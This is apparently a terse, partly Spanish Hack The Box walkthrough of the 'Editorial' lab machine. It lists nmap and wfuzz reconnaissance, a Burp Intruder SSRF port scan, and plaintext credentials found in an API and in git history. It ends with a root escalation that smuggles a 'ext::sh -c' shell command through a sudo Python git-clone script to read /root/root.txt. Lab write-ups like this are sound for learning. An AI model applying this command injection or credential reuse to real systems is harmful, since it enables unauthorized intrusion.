Editorial
HTB Linux
nmap -A -p- -oA editorial 10.10.11.20 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA editorial 10.10.11.20
echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA editorial-udp 10.10.11.20
ping -c 1 10.10.11.20

nmap -p- --open -T5 -v -n 10.10.11.20
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts

extractPorts allPorts

nmap -sCV -p22,80 10.10.11.20 -oN targeted

bc targeted -l rb

whatweb http://10.10.11.20

wfuzz -c --hc=404,400,302 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.11.20/FUZZ
Abrimos burpsuite y nos vamos a http://editorial.htb/upload

Agregamos un archivo.

Y vemos la peticion

Enviar a intruder. Darle click a Add y en la parte de $puerto$

Vamos a payload y hacemos lo siguiente:



Credenciales-> dev:dev080217_devAPI!@

ssh dev@10.10.11.20

cd apps
git log

git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Credenciales-> prod:080217_Producti0n_2023!@

su prod
sudo -l

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c touch% /tmp/root'
cat /tmp/root

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'
